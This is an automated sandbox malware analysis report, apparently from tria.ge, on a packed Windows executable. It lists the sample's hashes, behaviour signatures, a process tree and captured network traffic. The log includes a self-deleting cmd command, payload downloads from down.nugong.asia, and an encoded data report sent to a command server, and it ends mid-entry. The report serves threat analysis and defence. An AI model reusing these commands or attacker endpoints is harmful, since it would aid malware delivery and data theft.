Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

7

1987b42bfe...7b.exe

windows7-x64

10

1987b42bfe...7b.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    153s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/10/2023, 10:50 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe

  • Size

    271KB

  • MD5

    eb6c2b720bf1204827e513af9b93fc04

  • SHA1

    da49da66e4d4ce6a9c656f821eaed25ad599f772

  • SHA256

    1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b

  • SHA512

    e8e1723052346d31abb701b87b8deedb002fe42bc899d99efd040f13ee6e4b2516ee6f193ae7bb130280bf18ac959a29073245024256d87562aaa14ef5b5d649

  • SSDEEP

    6144:/l51orRJXlDixHkUXe34cEOkCybEaQRXr9HNdvOa:xqXUHkUXe3GOkx2LIa

Score
10/10
upx

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Drops file in System32 directory 26 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Modifies data under HKEY_USERS 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Program Files\getmac.exe
        "C:\Program Files\getmac.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Checks SCSI registry key(s)
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1836
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of UnmapMainImage
      • Suspicious use of WriteProcessMemory
      PID:3212
      • C:\Users\Admin\AppData\Local\Temp\1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe
        "C:\Users\Admin\AppData\Local\Temp\1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe"
        2⤵
        • Checks computer location settings
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Users\Admin\AppData\Local\Temp\1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2572
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 1
            4⤵
            • Delays execution with timeout.exe
            PID:3176
    • C:\Windows\Syswow64\eda5f540
      C:\Windows\Syswow64\eda5f540
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Windows\Syswow64\eda5f540"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 1
          3⤵
          • Delays execution with timeout.exe
          PID:8

    Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      4.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      4.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.154.82.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.154.82.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      down.nugong.asia
      eda5f540
      Remote address:
      114.114.114.114:53
      Request
      down.nugong.asia
      IN A
      Response
      down.nugong.asia
      IN CNAME
      down.nugong.asia.cdn.dnsv1.com.cn
      down.nugong.asia.cdn.dnsv1.com.cn
      IN CNAME
      ofgk41rd.slt.sched.tdnsv8.com
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      116.163.24.195
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.243
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      119.188.86.194
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      1.62.64.68
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      122.189.171.55
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      221.15.67.105
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      42.7.60.104
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      110.249.196.101
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      36.248.54.85
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      119.167.229.212
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      116.172.148.7
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      125.39.165.235
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      218.29.205.139
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.187
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.235.196
    • flag-cn
      GET
      https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.zip
      eda5f540
      Remote address:
      116.163.24.195:443
      Request
      GET /pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.zip HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 03 Aug 2023 03:22:49 GMT
      Etag: "07cd7f7ac6965327899891eef3600839"
      Content-Type: application/zip
      Date: Fri, 29 Sep 2023 06:36:44 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 7570708988939014002
      x-cos-request-id: NjUxNjcwN2JfZWYzNDY4MDlfZmZiMV8zMjA2MjFl
      Content-Length: 463923
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 12384900960947331076
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      114.114.114.114.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      114.114.114.114.in-addr.arpa
      IN PTR
      Response
      114.114.114.114.in-addr.arpa
      IN PTR
      public1114dnscom
    • flag-us
      DNS
      208.194.73.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      208.194.73.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      254.20.238.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      254.20.238.8.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      195.24.163.116.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      195.24.163.116.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      41.110.16.96.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      41.110.16.96.in-addr.arpa
      IN PTR
      Response
      41.110.16.96.in-addr.arpa
      IN PTR
      a96-16-110-41deploystaticakamaitechnologiescom
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.a-0001.a-msedge.net
      g-bing-com.a-0001.a-msedge.net
      IN CNAME
      dual-a-0001.a-msedge.net
      dual-a-0001.a-msedge.net
      IN A
      204.79.197.200
      dual-a-0001.a-msedge.net
      IN A
      13.107.21.200
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=07BFE75A6544636B2CA2F4FA640C62A8; domain=.bing.com; expires=Mon, 28-Oct-2024 10:50:51 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 50A86AF3DA0847F99BFCA6DE34A5E6E4 Ref B: BRU30EDGE0914 Ref C: 2023-10-04T10:50:51Z
      date: Wed, 04 Oct 2023 10:50:50 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=07BFE75A6544636B2CA2F4FA640C62A8
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 013C11163CC54F218AAC12C8355BD2E0 Ref B: BRU30EDGE0914 Ref C: 2023-10-04T10:50:51Z
      date: Wed, 04 Oct 2023 10:50:50 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=07BFE75A6544636B2CA2F4FA640C62A8
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 6F291559A6A84DDCAB71D3D8B53F91F6 Ref B: BRU30EDGE0914 Ref C: 2023-10-04T10:50:51Z
      date: Wed, 04 Oct 2023 10:50:51 GMT
    • flag-us
      DNS
      200.197.79.204.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      200.197.79.204.in-addr.arpa
      IN PTR
      Response
      200.197.79.204.in-addr.arpa
      IN PTR
      a-0001a-msedgenet
    • flag-us
      DNS
      26.35.223.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      26.35.223.20.in-addr.arpa
      IN PTR
      Response
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/ping.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Fri, 28 Jul 2023 03:05:56 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjRjMzMwOTRfY2Y1MGJlMDlfNjIyMF8xNjVlNDZj
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 11160378879197059676
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/ping.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Fri, 28 Jul 2023 03:05:56 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjRjMzMwOTRfY2Y1MGJlMDlfNjIyMF8xNjVlNDZj
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 9106975594564456352
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/userchange.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/userchange.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:56:00 GMT
      Etag: "5001520cededdba4392d6d3c567a2306"
      Content-Type: text/plain
      Date: Fri, 28 Jul 2023 06:26:24 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 12026736056808147491
      x-cos-meta-md5: 5001520cededdba4392d6d3c567a2306
      x-cos-request-id: NjRjMzVmOTBfOGUzYzY4MDlfODQ3Y18xOTUwMzk1
      Content-Length: 80
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 7098320501899191445
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/userpq.zip
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/userpq.zip HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 02 Oct 2023 08:00:15 GMT
      Etag: "fad231aeeb4c2eac2ff215a8172da6e7"
      Content-Type: application/zip
      Date: Mon, 02 Oct 2023 08:01:38 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 17983149572618678898
      x-cos-request-id: NjUxYTc4ZTJfZGFlZjk4MWVfMzA0ZF8yZDIyNTYw
      Content-Length: 13408
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 6547221676952680527
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/blacklist.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/blacklist.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 28 Sep 2023 07:54:14 GMT
      Etag: "81074a24b7f65c6446b4f014291bbbcb"
      Content-Type: text/plain
      Date: Thu, 28 Sep 2023 07:57:21 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11643962358373933104
      x-cos-request-id: NjUxNTMxZTBfNTBkNzdkMDlfMWI4NDFfMjY1MGRhYw==
      Content-Length: 12016
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 13668875218857656321
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/0d78fe00f48f2148.json
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/user/c995ec7fd4f57c0d/0d78fe00f48f2148.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 22 Aug 2023 06:33:29 GMT
      Etag: "1eba8e243164ae3e2c9243d802c5fd79"
      Content-Type: application/json
      Date: Tue, 22 Aug 2023 06:37:06 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3320060066327462193
      x-cos-request-id: NjRlNDU3OTJfNzRlZDk4MWVfYTI2Yl8zZGMxODk2
      Content-Length: 7248
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 1285885473667175676
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/pub/ms.json
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/pub/ms.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 04 Oct 2023 09:22:12 GMT
      Etag: "10040ea185914984ce16a2e607ba5ffc"
      Content-Type: application/json
      Date: Wed, 04 Oct 2023 09:25:22 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 1369726845627411732
      x-cos-request-id: NjUxZDJmODJfNjhlZTk4MWVfYjBkNF8zMDg2YzBi
      Content-Length: 70816
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 5664306608322357654
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/pub/ps.json
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/pub/ps.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 04 Oct 2023 09:22:12 GMT
      Etag: "38f11ea8d0226630fb9251be3a7b1e4b"
      Content-Type: application/json
      Date: Wed, 04 Oct 2023 09:25:19 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 5867845126828716719
      x-cos-request-id: NjUxZDJmN2ZfZGUxNWJlMDlfNzYyYV8yNTFkZGZm
      Content-Length: 14496
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 10896722524334358152
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 18 Aug 2023 07:39:30 GMT
      Etag: "d3ee55c63ac9cfa7fd408553f9369f5b"
      Content-Type: application/zip
      Date: Thu, 28 Sep 2023 19:24:41 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11311802544265698830
      x-cos-request-id: NjUxNWQyZjlfMjUxNWFlMDlfMTJmMGVfMTI0NzY3Nw==
      Content-Length: 902517
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 2246552894700331726
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/Lander.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/Lander.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 27 Sep 2023 08:22:42 GMT
      Etag: "75280d3857e9c4a765490c9349019639"
      Content-Type: text/plain
      Date: Wed, 27 Sep 2023 08:25:58 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 7593444196225492913
      x-cos-request-id: NjUxM2U3MTZfYWUyMzFkMDlfMTcwODBfMWI5ZmQyMQ==
      Content-Length: 22928
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 15607132006774316370
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/psexe.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/psexe.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 04 Oct 2023 10:27:26 GMT
      Etag: "61dce90040ba158479521e19bcdc6546"
      Content-Type: text/plain
      Date: Wed, 04 Oct 2023 10:30:35 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 7528396351655483740
      x-cos-request-id: NjUxZDNlY2JfODhhMDA4MDlfZWM5Yl8yZmI2NmZl
      Content-Length: 10896
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 6735520674813256835
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /report.php?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12 HTTP/1.1
      Host: mprrpt.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.19.1.1 Unicorn
      Date: Wed, 04 Oct 2023 10:50:34 GMT
      Content-Type: application/octet-stream
      Content-Type: text/html
      X-Cache-Lookup: Cache Miss
      Content-Length: 3
      X-NWS-LOG-UUID: 3369223833385548566
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/urlmd5.json
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/urlmd5.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 04 Oct 2023 10:49:02 GMT
      Etag: "a3545255258e02fabc6eef66423e1963"
      Content-Type: application/json
      Date: Wed, 04 Oct 2023 10:51:03 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 18144626213925968174
      x-cos-request-id: NjUxZDQzOTdfYTUwMTQwYl8yZjUwXzQ4YjlkOTg=
      Content-Length: 464
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 5886285415037095995
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      apps.game.qq.com
      getmac.exe
      Remote address:
      8.8.8.8:53
      Request
      apps.game.qq.com
      IN A
      Response
      apps.game.qq.com
      IN A
      101.227.134.49
      apps.game.qq.com
      IN A
      101.227.134.27
    • flag-cn
      GET
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      getmac.exe
      Remote address:
      101.227.134.49:443
      Request
      GET /comm-htdocs/ip/get_ip.php HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: apps.game.qq.com
      Connection: Close
      Response
      HTTP/1.1 200 OK
      Date: Wed, 04 Oct 2023 10:50:56 GMT
      Content-Type: text/html
      Content-Length: 49
      Connection: close
      Server: swoole-http-server
      Content-Encoding: gzip
    • flag-us
      DNS
      ocsp.digicert.cn
      getmac.exe
      Remote address:
      8.8.8.8:53
      Request
      ocsp.digicert.cn
      IN A
      Response
      ocsp.digicert.cn
      IN CNAME
      ocsp.digicert.cn.w.cdngslb.com
      ocsp.digicert.cn.w.cdngslb.com
      IN A
      47.246.48.205
    • flag-nl
      GET
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D
      getmac.exe
      Remote address:
      47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Wed, 04 Oct 2023 10:38:27 GMT
      Ali-Swift-Global-Savetime: 1696415907
      Via: cache2.l2de2[304,35,200-0,C], cache20.l2de2[36,0], cache5.nl2[0,0,200-0,H], cache8.nl2[1,0]
      Age: 749
      X-Cache: HIT TCP_MEM_HIT dirn:11:227517273
      X-Swift-SaveTime: Wed, 04 Oct 2023 10:38:27 GMT
      X-Swift-CacheTime: 3600
      Timing-Allow-Origin: *
      EagleId: 2ff6309c16964166562002682e
    • flag-nl
      GET
